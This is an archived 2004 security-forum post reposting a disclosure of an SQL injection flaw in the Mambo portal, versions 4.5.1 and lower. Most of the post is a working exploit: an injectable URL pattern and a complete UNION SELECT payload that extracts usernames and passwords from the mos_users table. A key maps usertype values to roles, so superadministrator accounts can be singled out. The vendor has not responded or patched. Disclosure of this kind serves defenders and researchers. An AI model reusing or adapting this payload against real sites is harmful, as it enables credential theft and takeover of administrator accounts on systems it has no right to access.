Mambo Portal Sql Injection Vulnerability.

Full Version: Mambo Portal Sql Injection Vulnerability.

GovernmentSecurity.org > The Archives > Exploit Articles

qcred11

Sep 18 2004, 06:02 PM

QUOTE

Vendor: www.mamboportal.com
Message from vendor : Mambo is one of the most powerful Open Source Content Management Systems on the planet. It is used all over the world for everything from simple websites to complex corporate applications. Mambo is easy to install, simple to manage, and reliable.

Bug name : SQL injection
Version : lastest Version 4.5.1(1.0.9) and lower.

Exploit :

http://www.mamboportal.com/index.php?optio...499%20and%201=0[SQL]/*

You can exploit from the table "mos_users" with the query below

http://www.mambosite.com/index.php?option=...ository&Itemid=[id]&func=selectfolder&filecatid=[id]%20and%201=0%20union%20all%20select%201,2,3,4,username,6,password,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23%20from%20mos_users%20where%20usertype=0/*

with the values of usertype :
0 = superadministrator
1 = administrator
2 = editor
3 = user
5 = publisher
6 = manager

Vendor feedback :
Not yet

Vendor patch :
Not yet

khoai

Source: http://seclists.org/lists/bugtraq/2004/Sep/0234.html

This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.